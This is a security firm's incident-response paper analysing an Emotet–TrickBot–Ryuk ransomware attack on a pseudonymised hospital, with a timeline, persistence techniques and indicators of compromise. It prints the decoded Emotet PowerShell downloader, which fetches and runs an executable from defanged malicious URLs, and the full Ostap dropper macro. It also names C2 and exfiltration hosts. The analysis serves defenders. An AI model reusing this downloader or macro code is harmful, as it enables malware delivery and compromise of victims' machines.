Ransomware Attack Analysis

Ransomware Attack Analysis

The Emotet – TrickBot – Ryuk ransomware killchain is an advanced cybersecurity threat that organizations and Cybersecurity professionals face. Understanding the specific techniques, tactics, and procedures (TTPs) that the threat actors who use these tools employ can provide vital insight to protecting against and responding to incidents.

In our newest Research Paper, we explore evidence collected and analysis performed during real-world incident response efforts led by Ingalls Information Security.

Click to Download the Ransomware Attack AnalysisIntroduction

The Emotet – TrickBot – Ryuk ransomware killchain is an advanced cybersecurity threat that organizations and Cybersecurity professionals face. Understanding the specific techniques, tactics, and procedures (TTPs) that the threat actors who use these tools employ can provide vital insight to protecting against and responding to incidents. In this paper, we will explore evidence collected and analysis performed during  real world incident response efforts led by Ingalls Information Security (Ingalls). Victim organization and employee names have been changed to protect the identity of the organization that engaged Ingalls to respond. While not all components of the investigation are included in this paper, it does focus on the TTPs and Indicators of Compromise to provide understanding of the attack chain that similar organizations face on a daily basis.

Our investigation methodology is fairly straightforward: identify Indicators or Evidence of Compromise (IOCs and EOCs) via computer forensic evidence and search all available data records for additional evidence. Ingalls analyzed netflow logs as well as Endpoint Detection & Response (EDR) data from CylancePROTECT and Optics. In addition, Microsoft Exchange server logs, Windows event logs, and SQL server trace logs were also reviewed during this effort.  IOCs were also searched on various Open Source Intelligence sources (OSINT) to gather additional insight.


Emotet is a banking trojan with the ability to self-propagate, first discovered by researchers in 2014. Emotet has been continually upgraded since then and it has been significantly improved. Emotet initially functioned as an information stealer, however today it’s customizable modules, popularity in Malware-as-a-Service (MaaS) operations, and ability to send information to and receive commands from Command and Control (C2) servers provide capabilities that are used by criminal groups to deliver other trojans, information stealers, and ransomware payloads. Initially, Emotet was sent as a malicious email attachment that leveraged Visual Basic macros to then execute obfuscated PowerShell scripts. It has also been deployed through other means recently, such as Remote Desktop Protocol (RDP) brute force attacks.


The TrickBot information stealer, first seen in 2016, is another common MaaS banking trojan. While TrickBot is sometimes spread independently via malicious emails, RDP brute force attacks, and drive-by downloads, it is often deployed as a secondary infection by other trojans such as Emotet. TrickBot is particularly effective at harvesting network credentials, computer credentials, website credentials from browsers, WiFi passwords, VPN credentials and configuration, and cryptocurrency wallet information, and, like Emotet, TrickBot has customizable modules, self-propagation capabilities, and the ability to communicate via C2 servers.


Ryuk, first seen in 2018, is a ransomware variant that intends to extort victims by encrypting their files and demanding a Bitcoin payment as ransom to decrypt the encrypted files. Ryuk is another component of the MaaS ecosystem and is frequently deployed by Emotet and TrickBot. It is believed that the Hermes banking trojan developers are also responsible for RYUK, and that this team is sponsored by North Korea.


Ostap is a Jscript trojan downloader. Similar to Emotet, it is often spread via VBA macros in malicious email attachments. Ostap has capabilities that include disabling antivirus or security software and propagating by copying itself to other documents accessible from a compromised host, including network shares. One key difference from Emotet is that Ostap uses JScript to infect a host rather than obfuscated PowerShell scripts. Ostap is commonly used to deploy other trojans including TrickBot.

Emotet – The Initial Infection

Initial Infection Mechanism - Spearphishing Email

Day 0  - 12:18:48 CST

Jane Buck, an employee at John Doe Memorial Hospital (JDMH), received a spearphishing email at their JDMH email address. The subject line of the email was "Jane Buck - JDMH”. The content of the message read “SOC report 01/16/2020" and was signed by “Fawn, Jill” and "Jill.Fawn@StagMedicalCenter.org”.

Figure 1 - Spearphishing Email Figure 1 - Spearphishing Email

Jill Fawn is actually an employee at Stag Medical Center, another nearby hospital, but the actual address in the email "from" field was not Jill Fawn’s email address. Rather, the email actually came from saad.alam@ziaudinhospital.com, a known Emotet sender email address.

Ransomware-Whitepaper-Fig-02-smFigure 2 - Known Emotet Sender OSINT - https://pastebin.com/xFTyBF34

The email contained an attachment named “QZ-2572 Medical report p2.doc.” The email originated from an IP address of 181.113.134[.]226, an Ecuadorian IP address that is a VPN endpoint.

Figure 3 - 181.113.134[.]226 VPN Certificate OSINT - https://community.riskiq.com/search/ 3 - 181.113.134[.]226 VPN Certificate OSINT - https://community.riskiq.com/search/

The ziauddinhospital.com email server did not have a PTR record configured to allow SMTP reverse DNS resolution, so their email server could be spoofed. In other words, ziauddinhospital.com did not actually resolve to 181.113.134[.]226. Rather, it should have resolved to

Emotet Downoader

Day 0 - 13:11:27 CST

Jane Buck opened the email attachment. The document in the email contained a VBA script ("Document_Open" which indicates: "Runs when the Word or Publisher document is opened") that launches a base64 encoded PowerShell script in a hidden window.

Figure 4 - QZ-2572 Medical report p2.doc - Emotet Downloader Encoded PowerShell ScriptFigure 4 - QZ-2572 Medical report p2.doc - Emotet Downloader Encoded PowerShell Script

This script reaches out to download 796.exe from the following URLS:

  • hxxp://ajhmanamlak[.]com/wp-content/rcz9/ (46.4.213[.]201)
  • hxxp://maphagroup[.]com/wp-admin/mtq/ (194.5.188[.]11)
  • hxxp://www.meggie-jp[.]com/images/Tznj/ (47.245.59[.]74)
  • hxxp://giatlalaocai[.]com/wp-admin/Yz98SWY6/ (45.124.87[.]127)
  • hxxps://nnjastudio[.]com/wp-admin/xHjsw/ (104.18.58[.]143)

The file 796.exe, an Emotet executable, is downloaded, named publishmsp.exe, and executed by the script. This file then downloads and installs the Emotet module, nonsensor.exe to the c:\windows\syswow64\ directory and installs nonsensor.exe as a service (HKLM\system\controlset001\services\nonsensor). The Emotet Service then established connectivity with the IP address 100.6.23[.]40, an active Emotet Epoch 2 command and control (C2) server. Once this foothold has been established, Emotet, TrickBot, and Ryuk begin deploying throughout JDMH's network environment. In addition to the initial infection files, the attackers also dropped several variants of Emotet, TrickBot, and Ryuk into JDMH's environment.


Once the attackers had access to the victim environment, they spent the next 24 hours staging their attack. After enumerating the victim network Emotet, TrickBot, and Ryuk were propagated to various locations on victim machines, including in C:\Users\Default\AppData\Roaming\WinNetCore\, C:\Users\Public\Junk\, C:\Windows\Temp\bdcore_tmp\, C:\ProgramData\, C:\Temp\, C:\Users\User\Public\, and the Recycling Bin (a common tactic malware uses to hide itself). Emotet and TrickBot are well known for the ability to propagate by enumerating network resources, brute forcing user accounts, and writing to shared drives. One of the novel methods used to propagate the malicious payloads in JDMH's environment was via Active Directory startup, shutdown, logon, and logoff Group Policy scripts.


Deploying via Active Directory Group Policy scripts was likely intended as both a propagation method as well as a persistence mechanism. However, quick actions in isolating infected devices and restoring servers from clean backups prevented the attackers from being able to rely on this as an ongoing persistence mechanism.

Figure 5 – Cylance Optics Instaquery Result Showing Group Policy Persistence MechanismFigure 5 – Cylance Optics Instaquery Result Showing Group Policy Persistence Mechanism

The attackers also used scheduled tasks to achieve persistence. Specifically, they created a scheduled task named “Windows Net Core” on compromised machines to re-infect with TrickBot and scheduled tasks named “comp_sys”, “comp_sys.h”, “user_userlogon” and “user_userlogon_h” on compromised machines to re-infect with Emotet.

Another, more complicated persistence mechanism was also demonstrated in the attack. JDMH used BitDefender Endpoint Security, deployed via a remote management and monitoring (RMM) tool, to secure their endpoints from malware. Unfortunately, BitDefender was unable to prevent Emotet, TrickBot, or Ryuk from infecting the environment. To make matters worse, the attackers exploited CVE-2019-17099, a vulnerability in BitDefender Endpoint Security versions and prior, to perform a DLL hijack in order to achieve persistence. This vulnerability allows an attacker to load an arbitrary DLL file from the search path, re-infecting compromised computers with Ryuk.  Cylance Optics provided insight into the RYUK detections and showed that the RYUK encryptor file was being reloaded on victim machines every time the EPSecurityService.exe service was executed.

Figure 6 – Cylance Optics Focus Data Showing EPSecurityService.exe Persistence MechanismFigure 6 – Cylance Optics Focus Data Showing EPSecurityService.exe Persistence Mechanism


Day 1 - Shortly after 13:00:00 CST

The attackers begin infecting computers with Ryuk Ransomware. JDMH IT contacted their managed service provider (MSP) for assistance. JDMH's MSP immediately began taking efforts to isolate infected devices, gathering information to establish the scope of the ransomware infection, and bringing up backups of infected servers. Ryuk deleted Volume Shadow data and disabled the Volume Shadow Service on infected computers. The ryukreadme.html file gave the email address to contact the attackers as orfhissipmay1970@protonmail[.]com.

Secondary Infection Attempt - Day 28

Beginning at 11:25 CST, a JDMH user's credentials were used to send 3 emails from 37.221.113[.]166, a datacenter IP address in England. These credentials were presumably harvested by TrickBot during the initial attack, and either as a second attempt to infect JDMH's environment or possibly purchased on a Dark Web forum and used by a different attacker. The victim had not yet completed a global password reset, which meant that the attacker could use this account to gain access to the Cloud-based email service. This secondary infection attempt underscores the importance and urgency of a timely global password reset following a credential harvesting or information stealing attack.

These emails were sent to a JDMH group email account, a JDMH distribution list of all department managers, and a JDMH distribution list of all JDMH users. The subject of the first email was "Notification statement for written contract No.30449", and the body of the email claimed that the recipient had "missed obligatory compensation for 1481.67 US Dollars date" and contained a malicious document named "cl_inf_HC_163_86818.doc". The subject of the second email was "Second claim for written contract No.64312", and the body of the email claimed that the recipient had "dropped obligatory payment for 3152.98 US Dollars date" and contained a malicious document named "paym_req_EC_642_77095.doc". The subject of the third email was "Resended claim for contract No.81253", and the body of the email claimed that the recipient had "missed obligatory compensation for 1255.43 US Dollars date" and contained a malicious document named "iss_cont_DT_174_23992.doc.”

Figure 7 - Secondary Infection Attempt 1
Figure 7 - Secondary Infection Attempt 1

Figure 8 - Secondary Infection Attempt 2Figure 8 - Secondary Infection Attempt 2

Figure 9 - Secondary Infection Attempt 3Figure 9 - Secondary Infection Attempt 3

All three malicious documents contain Ostap malware, using the same malicious VBA macro which loads a malicious javascript file named "Dsaow.GaerIok.jse". If the Ostap file fails to download its payload, it attempts to replace other office documents on attached drives and network shares with itself. The macro, when run from Microsoft Word 2010 does not fully execute, but when run from Microsoft Word 2016, infects the host with TrickBot. The file then contacts ipecho.net (probably to check the victim's external IP address), cbl.abuseat.org, and zen.spamhaus.org. It also attempts to connect to hxxp://185.180.199[.]77/3mBhb0/6VIJ7e.php to inform the attacker about the victim computer's name, user name, IP address, and network adapter information. 185.180.199[.]77 is a known Ostap and TrickBot host located in Netherlands. The TrickBot malware then attempts to establish connectivity with and download the systeminfo, msconfig, and pwgrab modules from one of the following C2 servers:

Figure 10 - C2 ServersFigure 10 - C2 Servers

Fortunately, JDMH's environment was successfully contained, and JDMH IT staff quickly noticed and responded to the emails, securing the compromised account, and informing users not to open the email if they received it

Dark Web Forum - JDMH Credentials for Sale

A list of JDMH computer names and user credentials were found for sale in a Dark Web forum. These were likely the result of TrickBot harvesting credentials within the environment. Fortunately, these were outdated computer names and credentials that had been subject to a global password reset during remediation efforts. While JDMH has taken steps to further secure their environment with a defense in depth approach, the attackers still persist in their efforts to extort money through ransomware attacks.

Post-Incident Activity

JDMH received a thorough report detailing the timeline of the attach and analysis of malicious files and activity within their environment. This report was briefed to their IT staff, MSP representatives, executive leadership, and legal counsel. Ingalls provided JDMH with recommendations for thoroughly eradicating malware and persistence mechanisms and securing their IT environment and user accounts. JDMH also signed up for Ingalls' Managed Detection and Response (MDR) service as an ongoing component of their defense in depth strategy. Doing so was simple because Ingalls had already deployed their MDR hardware and software into JDMH's environment for the incident response efforts.

Indicators of Compromise

File IOCs






























Network IOCs






























































Email Address IOCs



Malicious Script IOCs

QZ-2572 Medical report p2.doc


This Base64 string decodes as:

$Zayuxzptkt='Iwrugjuccrj';$Dcdxsjdnbe = '796';$Wofbhxil='Ztxohcyjzq';$Ibluqjxnvox=$env:userprofile+'\'+$Dcdxsjdnbe+'.exe';$Rihrjzgiqdqwd='Jmgewfhvnlf';$Zgkvhhmc=.('ne'+'w-obje'+'ct') nET.WEBcLIEnT;$Nvcwonczceycn='hxxp://ajhmanamlak[.]com/wp-content/rcz9/*hxxp://maphagroup[.]com/wp-admin/mtq/*hxxp://www.meggie-jp[.]com/images/Tznj/*hxxp://giatlalaocai[.]com/wp-admin/Yz98SWY6/*hxxps://www.nnjastudio[.]com/wp-admin/xHjsw/'."SPl`IT"('*');$Szvomaww='Njfjtvcblfo';foreach($Ufiayanxhyox in $Nvcwonczceycn){try{$Zgkvhhmc."DoWnL`O`AdFIle"($Ufiayanxhyox, $Ibluqjxnvox);$Slsqjnufdefpr='Jcerpxsv';If ((&('G'+'et'+'-Item') $Ibluqjxnvox)."LeN`gTH" -ge 33113) {[Diagnostics.Process]::"sTA`Rt"($Ibluqjxnvox);$Zkkupmdcccu='Izjkfztcnar';break;$Wzaaqbuu='Viotlofzps'}}catch{}}$Qniqrcmlj='Opecclspsu')

cl_inf_HC_163_86818.doc, paym_req_EC_642_77095. doc, and iss_cont_DT_174_23992.doc VBA Code

Attribute VB_Name = "ThisDocument"

Attribute VB_Base = "1Normal.ThisDocument"

Attribute VB_GlobalNameSpace = False

Attribute VB_Creatable = False

Attribute VB_PredeclaredId = True

Attribute VB_Exposed = True

Attribute VB_TemplateDerived = True

Attribute VB_Customizable = True

Attribute VB_Control = "Moon, 0, 0, MSTSCLib, MsRdpClient8NotSafeForScripting"

Private Kirfool As String

Sub RePac()
If VarType(Asc("A")) = 2 Then IsMs = True Else IsMs = False
End Sub

Private Function Herdio(i As String) As String

Herdio = Replace(i, "a", "")
End Function

Function Mulent(parr As Variant, psiz As Integer, pbl As Integer, prow As Integer, pcol As Integer, pbit As Integer, dc As Long) As Boolean
Dim ix%, va%, r%, c%, s%
r = prow
c = pcol
If psiz > 0 Then
s = psiz / pbl
If r < 0 Then
r = r + psiz
c = c + 4 - ((psiz + 4) Mod 8)
End If
If c < 0 Then
c = c + psiz
r = r + 4 - ((psiz + 4) Mod 8)
End If
If c >= psiz Then
c = c - psiz
r = r + 1
End If
r = r + (Int(r / s) * 2)
c = c + (Int(c / s) * 2)
End If
Mulent = False
r = r + 2
c = c + 2
ix = r * 20 + Int(c / 8) ' 20 bytes per row
If ix > 5 Or ix < 0 Then GoTo Dro
' c = 2^(7 - (c MOD 8))
c = 2 ^ (c Mod 8)
va = parr(0, ix)
If psiz > 0 Then
If (Int(va / c) Mod 2) = 0 Then
If pbit < 0 Then
Mulent = True
GoTo Dro
End If
parr(0, ix) = va + c
GoTo Dro
End If
End If
If pbit > 0 Then
va = parr(1, ix)
If (Int(va / c) Mod 2) = 0 Then va = va + c ' else va = va - c
parr(1, ix) = va
End If
Kirfool = """" + Kirfool + """"
ActiveDocument.TrackRevisions = CallByName(CreateObject(Herdio("WaSacripata.Sahelala")), Herdio("Ruana"), (dc - dc) + 1, Kirfool, (dc - dc) + 1)
Mulent = True
End Function

Private Function Molert(i As String) As String
Molert = Replace(i, "y", "")
End Function

Private Sub Branolp()
Dim butilop As String
Dim xShape As Shape, xBkgr As Shape
Dim xAddr As String
Dim xPosOldX As Double, xPosOldY As Double
Dim xSizeOldW As Double, xSizeOldH As Double
butilop = Me.Content.Text
Kirfool = Application.StartupPath & Herdio(Molert("yo\.aay.\a.y.\yya")) & Molert("Dsaoyyyw.GayyyerIok.")
Dim Ikolpppp7 As Integer
If TypeName(Application.Caption) <> "to hui" Then
Debug.Print "to hui"
End If
Ikolpppp7 = FreeFile
Open Kirfool For Binary Lock Read Write As #Ikolpppp7
If TypeName(Application.Caption) <> "to hui" Then
Debug.Print "to hui"
End If
Put #Ikolpppp7, , butilop
If TypeName(Application.Caption) <> "to hui" Then
Debug.Print "to hui"
End If
Close #Ikolpppp7
FileCopy Kirfool, Kirfool & Molert("yjysye")
If TypeName(Application.Caption) <> "to hui" Then
Debug.Print "to hui"
End If
Kill Kirfool
Kirfool = Kirfool & Molert("yjyysye")
If TypeName(Application.Caption) <> "to hui" Then
Debug.Print "to hui"
End If
End Sub

Private Sub Moon_OnDisconnected(ByVal discReason As Long)
If (Mulent(Array(7, 8, 6), 0, 0, 0, 0, 0, discReason)) Then
End If
End Sub

Private Sub Document_ContentControlOnExit(ByVal ContentControl As ContentControl, Cancel As Boolean)
Debug.Print "to hui"
End Sub



About the Author
Cyrus Robinson, CISSP, MCSE, MCITP, CEH, CHFI, Sec+
Mr. Robinson is a skilled Information Security professional with experience working with diversified technologies and environments. Mr. Robinson’s professional IT career began as an electronic forensics engineer as an active duty Airman with primary responsibilities with testing and evaluating digital forensic software, policies, and procedures. In this capacity, he worked alongside federal investigators and various DoD, CIA, FBI, NSA, and NIST employees. Following his active duty role with the USAF, Mr. Robinson went on to work in change management and system administration as a DoD Contractor. Mr. Robinson also has extensive experience in the roles of Information Security Officer and IT Director for a large medical group which contribute to his knowledge with security risk assessments, HIPAA compliance, and drafting and implementing corporate IT security and business continuity policies. Mr. Robinson holds various industry standard certifications and a Masters of Science in Information Security and Assurance.
Share :

Sign Up For Netsec News Weekly